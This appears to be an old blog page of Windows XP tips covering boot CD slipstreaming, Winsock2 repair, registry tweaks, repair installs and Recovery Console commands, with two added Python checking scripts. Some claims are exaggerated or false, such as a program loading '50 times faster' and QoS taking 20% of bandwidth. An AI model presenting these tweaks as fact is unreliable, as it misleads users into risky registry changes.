Thursday, July 31, 2008

defragment xp

Application and Boot file Defrag

This type of defrag pushes all commonly used programs and boot files to the edge of the hard drive for faster access. Windows XP normally schedules this every three days when it is idle; however, you can force it at any time by using the b switch,

i.e. defrag c: -b

decrease your application start up time

By default, Microsoft includes the /prefetch:1 switch to speed up its Windows Media Player application start time. This switch can be used for other Windows applications and also many third party programs.

Example #1

You have AOL 8.0 installed on the computer. Complete the steps outlined below to add the /prefetch:1 switch to AOL's Target path.

1. Right click on the AOL shortcut and select properties from the menu.

2. In the Target: Field add the /prefetch:1 switch to the very end of the path, like this: "C:\Program Files\America Online 8.0\aol.exe" /prefetch:1 and then click ok.

Now start AOL. It would load at least 50 times faster than ever before.

Example #2

1. Go to the Start button/All Programs/Accessories/System Tools

2. Right click on System Restore and select properties from the menu that appears. Add the /prefetch:1 to the Target Path entry so it looks like this %SystemRoot%\System32\restore\rstrui.exe /prefetch:1 and click ok.

Now System Restore will start immediately when executed.

Note: This switch will only work with some programs. Others will return a message saying the program in the target box is invalid. Just remove the switch.

win xp bootable cd

How to create a bootable Windows XP SP1 CD (Nero):

Step 1

Create 3 folders - C:\WINXPSP1, C:\SP1106 and C:\XPBOOT

Step 2

Copy the entire Windows XP CD into folder C:\WINXPSP1

Step 3

You will have to download the SP1 Update, which is 133MB.
Rename the Service Pack file to XP-SP1.EXE
Extract the Service Pack from the Run Dialog using the command:
C:\XP-SP1.EXE -U -X:C:\SP1106

Step 4

Open Start/Run... and type the command:
C:\SP1106\update\update.exe -s:C:\WINXPSP1

Click OK

Folder C:\WINXPSP1 contains: Windows XP SP1



How to Create a Windows XP SP1 CD Bootable

Step 1

Download xpboot.zip
http://thro.port5.com/xpboot.zip

( no download manager !! )

Extract the xpboot.zip file (xpboot.bin) into the folder C:\XPBOOT

Step 2

Start Nero - Burning Rom.
Select File > New... from the menu.
1.) Select CD-ROM (Boot)
2.) Select Image file from Source of boot image data
3.) Set Kind of emulation: to No Emulation
4.) Set Load segment of sectors (hex!): to 07C0
5.) Set Number of loaded sectors: to 4
6.) Press the Browse... button



Step 3

Select All Files (*.*) from File of type:
Locate boot.bin in the folder C:\XPBOOT

Step 4

Click ISO tab
Set File-/Directory length to ISO Level 1 (Max. of 11 = 8 + 3 chars)
Set Format to Mode 1
Set Character Set to ISO 9660
Check all Relax ISO Restrictions




Step 5

Click Label Tab
Select ISO9660 from the drop down box.
Enter the Volume Label as WB2PFRE_EN
Enter the System Identifier as WB2PFRE_EN
Enter the Volume Set as WB2PFRE_EN
Enter the Publisher as MICROSOFT CORPORATION
Enter the Data Preparer as MICROSOFT CORPORATION
Enter the Application as WB2PFRE_EN

* For Windows XP Professional OEM substitute WB2PFRE_EN with WXPOEM_EN
* For Windows XP Home OEM substitute WB2PFRE_EN with WXHOEM_EN

Step 6

Click Burn tab
Check Write
Check Finalize CD (No further writing possible!)
Set Write Method to Disk-At-Once

Press New button

Step 7

Locate the folder C:\WINXPSP1
Select everything in the folder and drag it to the ISO compilation panel.
Click the Write CD Dialog button.

Press Write

You're done.

win xp system response reboot without rebooting

Have you ever been using your computer when the system suddenly stops responding, so that if you try to open something it just hangs? One time I tried deleting a folder and it said it was in use, but it really wasn't. If this ever happens to you, you can follow these simple steps to 'reboot' your computer without 'rebooting' it.

Press CTRL + ALT + DEL

Go to the 'processes' tab and click explorer.exe once and then click 'end process'.

Now, click File > New Task and type explorer.exe

Everything should be fine now! If the problem is major, I would recommend actually shutting down then starting up again.

Winxp Tips And Tricks, Winsock 2 repair

Repairing Damaged Winsock2

The symptoms when Winsock2 is damaged show when you try to release and renew the IP address using IPCONFIG...

And you get the following error message:

An error occurred while renewing interface 'Internet': An operation was attempted on something that is not a socket.

Also Internet Explorer may give the following error message:
The page cannot be displayed

Additionally, you may have no IP address or no Automatic Private IP Addressing (APIPA) address, and you may be receiving IP packets but not sending them.

There are two easy ways to determine if Winsock2 is damaged:

From the XP source files, go to the Support / Tools directory

Winsock Test Method 1
Run netdiag /test:winsock

The end should say Winsock test ..... passed

Winsock Test Method 2

Run Msinfo32
Click on the + by Components
Click on the + by Network
Click on Protocol
There should be 10 sections if the Winsock2 key is ok
MSAFD Tcpip [TCP/IP]
MSAFD Tcpip [UDP/IP]
RSVP UDP Service Provider
RSVP TCP Service Provider
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...

If the names are anything different from those in this list, then likely Winsock2 is corrupted and needs to be repaired.
If you have any 3rd party software installed, the name MSAFD may be changed.
There should be no fewer than 10 sections.
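
The comparison in Test Method 2 can be scripted. The following Python is an added example, not part of the original post: it takes the section names as copied from Msinfo32 and checks them against the list above. The sample lists, including the placeholder adapter names and the "Example Filter" entry, are constructed for illustration.

```python
# Added example: compare the protocol section names shown in Msinfo32
# (Components > Network > Protocol) against the ten-entry list above.

# The four fully named entries from the list above.
EXPECTED_EXACT = [
    "MSAFD Tcpip [TCP/IP]",
    "MSAFD Tcpip [UDP/IP]",
    "RSVP UDP Service Provider",
    "RSVP TCP Service Provider",
]
# The six NetBIOS names are cut off on the page, so only the visible
# prefix is matched.
NETBIOS_PREFIX = r"MSAFD NetBIOS [\Device\NetBT_Tcpip"
MIN_SECTIONS = 10


def check_protocols(names):
    """Classify a list of protocol section names copied from Msinfo32."""
    names = [n.strip() for n in names if n.strip()]
    missing = [e for e in EXPECTED_EXACT if e not in names]
    netbios = [n for n in names if n.startswith(NETBIOS_PREFIX)]
    unexpected = [
        n for n in names
        if n not in EXPECTED_EXACT and not n.startswith(NETBIOS_PREFIX)
    ]
    if len(names) < MIN_SECTIONS:
        verdict = "repair"   # fewer than 10 sections
    elif missing or unexpected:
        verdict = "review"   # names differ: corruption or third-party software
    else:
        verdict = "ok"
    return {
        "count": len(names),
        "netbios": len(netbios),
        "missing": missing,
        "unexpected": unexpected,
        "verdict": verdict,
    }


def sample_netbios(n):
    """Constructed sample names; the adapter part is a placeholder."""
    return [NETBIOS_PREFIX + "_{SAMPLE-%d}]" % i for i in range(n)]


# Constructed inputs: a healthy catalog, one where a third-party product
# has replaced an MSAFD entry, and one with sections missing.
HEALTHY = EXPECTED_EXACT + sample_netbios(6)
THIRD_PARTY = (["Example Filter over [MSAFD Tcpip [TCP/IP]]"]
               + EXPECTED_EXACT[1:] + sample_netbios(6))
DAMAGED = EXPECTED_EXACT[:2] + sample_netbios(2)

if __name__ == "__main__":
    for label, sample in (("healthy", HEALTHY),
                          ("third-party", THIRD_PARTY),
                          ("damaged", DAMAGED)):
        result = check_protocols(sample)
        print(label, result["verdict"], result["count"],
              result["missing"], result["unexpected"])
```

A "review" verdict means the names differ from the list: look at the unexpected entries and decide whether they belong to software you installed before deleting any keys.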

To repair Winsock2

Run Regedit
Delete the following two registry keys:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2

Restart the computer
Go to Network Connections
Right click and select Properties
Click on the Install button
Select Protocol
Click on the Add button
Click on the Have Disk button
Browse to the \Windows\inf directory
Click on the Open button
Click on the OK button
Highlight Internet Protocol (TCP/IP)
Click on the OK button
Reboot

XP Folder View Does Not Stay at Your Setting

Grab your registry editor and join in

Why Doesn't Windows Remember My Folder View Settings?

If you've changed the view settings for a folder, but Windows "forgets" the settings when you open the folder again, or if Windows doesn't seem to remember the size or position of your folder window when you reopen it, this could be caused by the default limitation on storing view settings data in the registry; by default Windows only remembers settings for a total of 200 local folders and 200 network folders.

To work around this problem, create a BagMRU Size DWORD value in both of the following registry keys, and then set the value data for both values to the number of folders that you want Windows to remember the settings for. For example, for Windows to remember the settings for 5000 local folders and 5000 network folders, set both values to 5000.

Here is how:

Follow these steps, and then quit Registry Editor:
1. Click Start, click Run, type regedit, and then click OK.
2. Locate and then click the following key in the registry:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell
3. On the Edit menu, point to New, and then click DWORD Value.
4. Type BagMRU Size, and then press ENTER.
5. On the Edit menu, click Modify.
6. Type 5000, and then click OK.

AND:

1. Locate and then click the following key in the registry:
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam
2. On the Edit menu, point to New, and then click DWORD Value.
3. Type BagMRU Size, and then press ENTER.
4. On the Edit menu, click Modify.
5. Type 5000, and then click OK.

Note:

When you use roaming user profiles, registry information is copied to a server when you log off and copied to your local computer when you log on. Therefore, you may have performance issues if you increase the BagMRU Size values for roaming user profiles.

XP Repair install

1. Boot the computer using the XP CD. You may need to change the
boot order in the system BIOS. Check your system documentation
for steps to access the BIOS and change the boot order.


2. When you see the "Welcome To Setup" screen, you will see the
options below:

This portion of the Setup program prepares Microsoft
Windows XP to run on your computer:

To setup Windows XP now, press ENTER.

To repair a Windows XP installation using Recovery Console, press R.

To quit Setup without installing Windows XP, press F3.




3. Press Enter to start the Windows Setup.

Do not choose "To repair a Windows XP installation using the
Recovery Console, press R", (you do not want to load Recovery
Console). I repeat, do not choose "To repair a Windows XP
installation using the Recovery Console, press R".

4. Accept the License Agreement and Windows will search for existing
Windows installations.

5. Select the XP installation you want to repair from the list and
press R to start the repair. If Repair is not one of the options,
read this Warning!!

6. Setup will copy the necessary files to the hard drive and reboot.
Do not press any key to boot from CD when the message appears.
Setup will continue as if it were doing a clean install, but your
applications and settings will remain intact.

Blaster worm warning: Do not immediately activate over the internet
when asked, enable the XP firewall
[ http://support.microsoft.com/?kbid=283673 ]
before connecting to the internet. You can activate after the
firewall is enabled. Control Panel - Network Connections. Right click
the connection you use, Properties, and there is a check box on the
Advanced [ http://michaelstevenstech.com/xpfirewall1.jpg ] page.


7. Reapply updates or service packs applied since initial Windows XP
installation. Please note that a Repair Install from the Original
install XP CD will remove SP1/SP2 and service packs will need to be
reapplied.
Service Pack 2
http://www.microsoft.com/downloads/details.aspx?FamilyId=049C9DBE-3B8E-4F30-8245-9E368D3CDB5A&displaylang=en
An option I highly recommend is creating a Slipstreamed XP CD with SP2.
Slipstreaming Windows XP with Service Pack 2 (SP2)
http://www.winsupersite.com/showcase/windowsxp_sp2_slipstream.asp

______________________________________________________________________

Warning!!
If the option to Repair Install is not available and you continue
with the install, you will delete your Windows folder and Documents
and Settings folder. All applications that place keys in the registry
will need to be re-installed. You should exit setup if the repair
option is not available and consider other options.

Try the link below if the repair option is not available.
Windows XP Crashed? Here's Help.
A salvage mission into the depths of Windows XP, explained by a
non-geek
by Charlie White
http://www.digitalwebcast.com/2002/03_mar/tutorials/cw_boot_toot.htm

Related links
You May Lose Data or Program Settings After Reinstalling, Repairing,
or Upgrading Windows XP (Q312369)
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q312369

System Restore "Restore Points" Are Missing or Deleted (Q301224)
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q301224

How to Perform an In-Place Upgrade (Reinstallation) of Windows XP
(Q315341)
http://support.microsoft.com/search/preview.aspx?scid=kb;en-us;Q315341

Warning!! If the Repair Option is not Available
What should I do? Most important do not ignore the information below!

If the option to Repair Install is NOT available and you continue
with the install; you will delete your Windows folder, Documents and
Settings folders. All Applications that place keys in the registry
will need to be re-installed.

You should exit setup if the repair option is not available and
consider other options. I have found if the Repair option is not
available, XP is usually not repairable and will require a Clean
install.
http://michaelstevenstech.com/cleanxpinstall.html
If you still have the ability to access the Windows XP installation,
back up all important files not restorable from other sources before
attempting any recovery console troubleshooting attempts.

Possible Fix by reconfiguring boot.ini using Recovery Console.
1. Boot with XP CD or 6 floppy boot disk set.
2. Press R to load the Recovery Console.
3. Type bootcfg.
4. This should fix any boot.ini errors causing setup not to see the
XP OS install.
5. Try the repair install.

One more suggestion from MVP Alex Nichol

"Reboot, this time taking the immediate R option, and if the CD
letter is say K: give these commands

COPY K:\i386\ntldr C:\
COPY K:\i386\ntdetect.com C:\


(two other files needed - just in case)

1. Type:
ATTRIB -H -R -S C:\boot.ini
DEL C:\boot.ini

2. Type: BootCfg /Rebuild

which will get rid of any damaged boot.ini, search the disk for
systems and make a new one. This might even result in a damaged
windows reappearing; but gives another chance of getting at the
repair"


Feedback on success or failure of the above fix would be greatly
appreciated.
xpnews@michaelstevenstech.com

Your homepage never being changed

Some websites illegally modify your registry and set their website as the default home page. To stop this:

1. Right-click on the Internet Explorer icon on your desktop and select "Properties".

2. In the "Target" box you will see "C:\Program Files\Internet Explorer\IEXPLORE.EXE".

3. Now add the URL of the site to the end of this; it overrides any
Homepage setting in Internet Options:

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" www.shareordie.com

Unlock toolbar to work with them

A toolbar is a collection of buttons or icons—usually displayed across the top of the screen—that represents the different tasks you can do within a program. For example, in Microsoft Internet Explorer, there is a toolbar for the standard Internet Explorer command buttons, one for entering an Internet address, and one for quick links you can set up.

When you open a toolbar, it will appear in a particular spot on the screen. If you want to change the location of the toolbar you can move it by dragging it to the new location. You can also resize the toolbar by dragging its edge. If you find a toolbar that cannot be moved or resized, the toolbar may be locked.

To unlock a toolbar

1. Make sure you have only one window open for the program. (You can look at the taskbar at the bottom of your screen to verify this.) Then, right-click the toolbar.

2. If Lock the Toolbars appears on the shortcut menu and is selected (a check mark appears to the left of it), click Lock the Toolbars to unlock the toolbar. If you see Lock the Toolbars, but no check mark appears to the left of it, the toolbar is already unlocked.

Note: If Lock the Toolbars does not appear on the shortcut menu, you may not be able to move or resize the toolbar.

If you are able to move the toolbar, once you’ve moved the toolbar to the location where you want it, select Lock the Toolbars so that it isn’t inadvertently moved. To make sure the change is permanent, lock the toolbar, exit the program, and then reopen it. The toolbar should be locked.

Toolbar shortcut menu with Lock the Toolbars selected

Win Xp tweaks

-----------
STARTUP
-----------


Windows Prefetcher
******************
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Session Manager \ Memory Management \ PrefetchParameters]

Under this key there is a setting called EnablePrefetcher, the default setting of which is 3. Increasing this number to 5 gives the prefetcher system more system resources to prefetch application data for faster load times. Depending on the number of boot processes you run on your computer, you may get benefits from settings up to 9. However, I do not have any substantive research data on settings above 5 so I cannot verify the benefits of a higher setting. This setting also may affect the loading times of your most frequently launched applications. This setting will not take effect until after you reboot your system.


Master File Table Zone Reservation
**********************************
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ FileSystem]

Under this key there is a setting called NtfsMftZoneReservation, the default setting of which is 1. The range of this value is from 1 to 4. The default setting reserves one-eighth of the volume for the MFT. A setting of 2 reserves one-quarter of the volume for the MFT. A setting of 3 for NtfsMftZoneReservation reserves three-eighths of the volume for the MFT and setting it to 4 reserves half of the volume for the MFT. Most users will never exceed one-quarter of the volume. I recommend a setting of 2 for most users. This allows for a "moderate number of files" commensurate with the number of small files included in most computer games and applications. Reboot after applying this tweak.


Optimize Boot Files
*******************
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Dfrg \ BootOptimizeFunction]

Under this key is a text value named Enable. A value of Y for this setting enables the boot files defragmenter. This setting defragments the boot files and may move the boot files to the beginning (fastest) part of the partition, but that last statement is unverified. Reboot after applying this tweak.

Optimizing Startup Programs [msconfig]
**************************************

MSConfig, similar to the application included in Win9x of the same name, allows the user to fine tune the applications that are launched at startup without forcing the user to delve deep into the registry. To disable some of the applications launched, load msconfig.exe from the run command line, and go to the Startup tab. From there, un-ticking the checkbox next to a startup item will stop it from launching. There are a few applications that you will never want to disable (ctfmon comes to mind), but for the most part the best settings vary greatly from system to system.

As a good rule of thumb, though, it is unlikely that you will want to disable anything in the Windows directory (unless it's a third-party program that was incorrectly installed into the Windows directory), nor will you want to disable anything directly relating to your system hardware. The only exception to this is when you are dealing with software, which does not give you any added benefits (some OEM dealers load your system up with software you do not need). The nice part of msconfig is that it does not delete any of the settings, it simply disables them, and so you can go back and restart a startup application if you find that you need it. This optimization won't take effect until after a reboot.

Bootvis Application
*******************
The program was designed by Microsoft to enable Windows XP to cold boot in 30 seconds, return from hibernation in 20 seconds, and return from standby in 10 seconds. Bootvis has two extremely useful features. First, it can be used to optimize the boot process on your computer automatically. Second, it can be used to analyze the boot process for specific subsystems that are having difficulty loading. The first process specifically targets the prefetching subsystem, as well as the layout of boot files on the disk. When both of these systems are optimized, it can result in a significant reduction in the time it takes for the computer to boot.

Before attempting to use Bootvis to analyze or optimize the boot performance of your system, make sure that the task scheduler service has been enabled – the program requires the service to run properly. Also, close all open programs as well – using the software requires a reboot.

To use the software to optimize your system startup, first start with a full analysis of a fresh boot. Start Bootvis, go to the Tools menu, and select next boot. Set the Trace Repetition Settings to 2 repetitions, Start at 1, and Reboot automatically. Then set the trace into motion. The system will fully reboot twice, and then reopen bootvis and open the second trace file (should have _2 in the name). Analyze the graphs and make any changes that you think are necessary (this is a great tool for determining which startup programs you want to kill using msconfig). Once you have made your optimizations go to the Trace menu, and select the Optimize System item. This will cause the system to reboot and will then make some changes to the file structure on the hard drive (this includes a defragmentation of boot files and a shifting of their location to the fastest portion of the hard disk, as well as some other optimizations). After this is done, once again run a Trace analysis as above, except change the starting number to 3. Once the system has rebooted both times, compare the charts from the second trace to the charts for the fourth trace to show you the time improvement of the system's boot up.

The standard defragmenter included with Windows XP will not undo the boot optimizations performed by this application.



-----------------------------------
General Performance Tweaks
-----------------------------------


IRQ Priority Tweak
******************
[HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ PriorityControl]

You will need to create a new DWORD: IRQ#Priority (where # is the number of the IRQ you want to prioritize) and give it a setting of 1. This setting gives the requisite IRQ channel priority over the other IRQs on a software level. This can be extremely important for functions and hardware subsystems that need real-time access to other parts of the system. There are several different subsystems that might benefit from this tweak. Generally, I recommend giving either the System CMOS or the video card priority. The System CMOS generally has an IRQ setting of 8, and giving it priority enhances the I/O performance of the system. Giving priority to the video card can increase frame rates and make AGP more effective.

You can give several IRQs priority, but I am not entirely certain how the system interacts when several IRQs are given priority – it may cause random instabilities in the system, although it is more likely that there's a parsing system built into Windows XP to handle such an occurrence. Either way, I would not recommend it.

QoS tweak
*********
QoS (Quality of Service) is a networking subsystem which is supposed to ensure that the network runs properly. The problem with the system is that it eats up 20% of the total bandwidth of any networking service on the computer (including your internet connection). If you are running XP Professional, you can disable the bandwidth quota reserved for the system using the Group Policy Editor [gpedit.msc].

You can run the group policy editor from the Run command line. To find the setting, expand "Local Computer Policy" and go to "Administrative Templates" under "Computer Configuration." Then find the "Network" branch and select "QoS Packet Scheduler." In the right hand box, double click on the "Limit Reservable Bandwidth." From within the Settings tab, enable the setting and then go into the "Bandwidth Limit %" and set it to 0%. The reason for this is that if you disable this setting, the computer defaults to 20%. This is true even when you aren't using QoS.

Free Idle Tasks Tweak
*********************

This tweak will free up processing time from any idle processes and allow it to be used by the foreground application. It is useful particularly if you are running a game or other 3D application. Create a new shortcut to "Rundll32.exe advapi32.dll,ProcessIdleTasks" and place it on your desktop. Double-click on it anytime you need all of your processing power, before opening the application.

Windows Indexing Services
*************************
Windows Indexing Services creates a searchable database that makes system searches for words and files progress much faster – however, it takes an enormous amount of hard drive space as well as a significant amount of extra CPU cycles to maintain the system. Most users will want to disable this service to release the resources for use by the system. To turn off indexing, open My Computer and right click on the drive on which you wish to disable the Indexing Service. Enter the drive's properties and under the general tab, untick the box for "Allow the Indexing Service to index this disk for fast file searching."

Priority Tweak
**************
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ PriorityControl]

This setting effectively runs each instance of an application in its own process for significantly faster application performance and greater stability. This is extremely useful for users with stability problems, as it can isolate specific instances of a program so as not to bring down the entire application. And, it is particularly useful for users of Internet Explorer, for if a rogue web page crashes your browser window, it does not bring the other browser windows down with it. It has a similar effect on any software package where multiple instances might be running at once, such as Microsoft Word. The only problem is that this takes up significantly more memory, because such instances of a program cannot share information that is in active memory (many DLLs and such will have to be loaded into memory multiple times). Because of this, it is not recommended for anyone with less than 512 MB of RAM, unless they are running beta software (or have some other reason for needing the added stability).

There are two parts to this tweak. First is to optimize XP's priority control for the processes. Browse to HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ PriorityControl and set the "Win32PrioritySeparation" DWORD to 38. Next, go into My Computer and under Tools, open the Folder Options menu. Select the View tab and check the "Launch folder windows in separate process" box. This setting actually forces each window into its own memory thread and gives it a separate process priority.

Powertweak application
**********************
xxx.powertweak.com

Powertweak is an application, which acts much like a driver for our chipsets. It optimizes the communication between the chipset and the CPU, and unlocks several "hidden" features of the chipset that can increase the speed of the system. Specifically, it tweaks the internal registers of the chipset and processor that the BIOS does not for better communication performance between subsystems. Supported CPUs and chipsets can see a significant increase in I/O bandwidth, increasing the speed of the entire system. Currently the application supports most popular CPUs and chipsets, although you will need to check the website for your specific processor/chipset combo – the programmer is working on integrating even more chipsets and CPUs into the software.

Offload Network Task Processing onto the Network Card
*****************************************************
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters]

Many newer network cards have the ability of taking some of the network processing load off of the processor and performing it right on the card (much like Hardware T&L on most new video cards). This can significantly lower the CPU processes needed to maintain a network connection, freeing up that processor time for other tasks. This does not work on all cards, and it can cause network connectivity problems on systems where the service is enabled but unsupported, so please check with your NIC manufacturer prior to enabling this tweak. Find the DWORD "DisableTaskOffload" and set the value to 0 (the default value is 1). If the key is not already available, create it.

Force XP to Unload DLLs
***********************
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer]
"AlwaysUnloadDLL"=dword:00000001

XP has a bad habit of keeping dynamic link libraries that are no longer in use resident in memory. Not only do the DLLs use up precious memory space, but they also tend to cause stability problems in some systems. To force XP to unload any DLLs in memory when the application that called them is no longer in memory, browse to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer and find the DWORD "AlwaysUnloadDLL". You may need to create this key. Set the value to 1 to force the operating system to unload DLLs.

Give 16-bit apps their own separate processes
*********************************************
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ WOW]
"DefaultSeparateVDM"="Yes"

By default, Windows XP will only open one 16-bit process and cram all 16-bit apps running on the system at a given time into that process. This simulates how MS-DOS based systems viewed systems and is necessary for some older applications that run together and share resources. However, most 16-bit applications work perfectly well by themselves and would benefit from the added performance and stability of their own dedicated resources. To force Windows XP to give each 16-bit application its own resources, browse to HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ WOW and find the String "DefaultSeparateVDM". If it is not there, you may need to create it. Set the value of this to Yes to give each 16-bit application its own process, and No to have the 16-bit applications all run in the same memory space.

Disable User Tracking
*********************
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer]
"NoInstrumentation"=dword:00000001

The user tracking system built into Windows XP is useless to 99% of users (there are very few uses for the information collected other than for a very nosy system admin), and it uses up precious resources to boot, so it makes sense to disable this "feature" of Windows XP. To do so, browse to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer and find the DWORD "NoInstrumentation". You may need to create this key if it is not there. The default setting is 0, but setting it to 1 will disable most of the user tracking features of the system.

Thumbnail Cache
***************
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced]
"DisableThumbnailCache"=dword:00000001

Windows XP has a neat feature for graphic and video files that creates a "thumbnail" of the image or first frame of the video and makes it into an oversized icon for the file. There are two ways that Explorer can do this: it can create them fresh each time you access the folder, or it can load them from a thumbnail cache. The thumbnail caches on systems with a large number of image and video files can become staggeringly large. To disable the Thumbnail Cache, browse to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced and find the DWORD "DisableThumbnailCache". You may need to create this key. A setting of 1 is recommended for systems where the number of graphic and video files is large, and a setting of 0 is recommended for systems not concerned about hard drive space, as loading the files from the cache is significantly quicker than creating them from scratch each time a folder is accessed.
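
As an added example (not part of the original post), the Python below parses the text of a Regedit export and reports which of the registry values discussed in this section are present, and whether they differ from the defaults the text states. The sample export is constructed; on a real system, export the keys from Regedit and pass the decoded file text to audit().

```python
import re

# Registry values discussed in this section, with the default the text
# states (None where the text gives no default).
WATCHED = {
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager"
     r"\Memory Management\PrefetchParameters", "EnablePrefetcher"): 3,
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem",
     "NtfsMftZoneReservation"): 1,
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction",
     "Enable"): None,
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\PriorityControl",
     "Win32PrioritySeparation"): None,
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters",
     "DisableTaskOffload"): 1,
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer",
     "AlwaysUnloadDLL"): None,
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WOW",
     "DefaultSeparateVDM"): None,
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
     r"\Policies\Explorer", "NoInstrumentation"): 0,
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
     r"\Explorer\Advanced", "DisableThumbnailCache"): None,
}

SECTION = re.compile(r"^\[(.+)\]$")
VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')
DWORD = re.compile(r"^dword:([0-9a-fA-F]{1,8})$")


def parse_reg(text):
    """Return {(key, value name): data} for DWORD and string values.

    Key and value names are lower-cased because the registry is not
    case-sensitive. Regedit "Version 5.00" files are UTF-16 on disk, so
    decode them before passing the text in.
    """
    values = {}
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        section = SECTION.match(line)
        if section:
            key = section.group(1).lower()
            continue
        entry = VALUE.match(line)
        if entry is None or key is None:
            continue  # header line, default (@) value, or continuation
        name, data = entry.group(1).lower(), entry.group(2)
        dword = DWORD.match(data)
        if dword:
            values[(key, name)] = int(dword.group(1), 16)
        elif len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            # Undo the backslash escaping .reg files use inside strings.
            values[(key, name)] = re.sub(r"\\(.)", r"\1", data[1:-1])
        # hex(...) and other value types are not used by these settings
    return values


def audit(text):
    """List (value name, data found, status) for every watched setting."""
    found = parse_reg(text)
    report = []
    for (key, name), default in WATCHED.items():
        value = found.get((key.lower(), name.lower()))
        if value is None:
            status = "not set"
        elif default is None:
            status = "set"
        elif value == default:
            status = "default"
        else:
            status = "changed"
        report.append((name, value, status))
    return report


# Constructed sample export, for illustration only.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters]
"EnablePrefetcher"=dword:00000005

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"NtfsMftZoneReservation"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WOW]
"DefaultSeparateVDM"="Yes"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoInstrumentation"=dword:00000001
"""

if __name__ == "__main__":
    for name, value, status in audit(SAMPLE_EXPORT):
        print("%-26s %-8r %s" % (name, value, status))
```

Keeping the report from before and after a tuning session gives a record of exactly which values were changed, which makes a tweak easy to roll back.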

How to Auto Delete %temp% file

What I prefer is %temp% (without quotes) at Start -> Run.
This opens your temp folder and then you can erase it neatly. Still, try this one too:


First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click "Do Not Delete Temp Folder Upon Exit"
Go to Properties and hit Disable. Now the next time Windows puts a temp file in that folder, it will automatically delete it when it's done!

Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.

5 Useful xp tricks

The Windows XP start menu
The Windows XP start menu is one of the most important menus in Windows. But it seems to have a mind of its own.

Don't you agree that YOU should decide what goes on this menu?

The Most Frequently Used (MFU) list
Did you notice that it has a "most frequently used" list? This list keeps track of how often programs are used. It is the portion of the start menu between "All Programs" and the horizontal line under the "pinned" items.

The population of your MFU list may seem strange at times. Maybe you see programs that you haven't used in ages. Maybe you don't see programs that you'd expect to see. And even if the content seems logical, the list "lives", so you can never count on a program to be there.

To make the content of the start menu more reliable, it may be a good idea to decrease the size of the MFU list a bit and make more room for the "pinned" list.

The programs, documents, web sites, ... that you put on the pinned list are there to stay. Once you put them there, you can count on them to be there. Your default web browser and e-mail program are on the pinned list by default, but you can remove them if you want.

How to put a program on the pinned list?
Click on the Start button and navigate to the program that you want on the pinned list
Right-click this program and select "Pin to Start menu"

A document that you use often on the pinned list?
Open Windows Explorer, navigate to that document, right-click and drag that document to the Start button and release the right mouse button when your mouse pointer is on the Start button.

An often visited web site on the pinned list?
Fire up your web browser and make sure that it's not maximized so that you can also see some of your desktop
Go to the web page that you want to pin to the start menu
Click and hold the pictogram next to the URL in the address bar and drag the icon to your desktop



The icon that you need to drag to your desktop

Windows puts a shortcut on your desktop. Click this shortcut and drag it to your start button. The shortcut is now on your pinned list and you can safely remove it from your desktop to tidy up.

More room for the pinned list
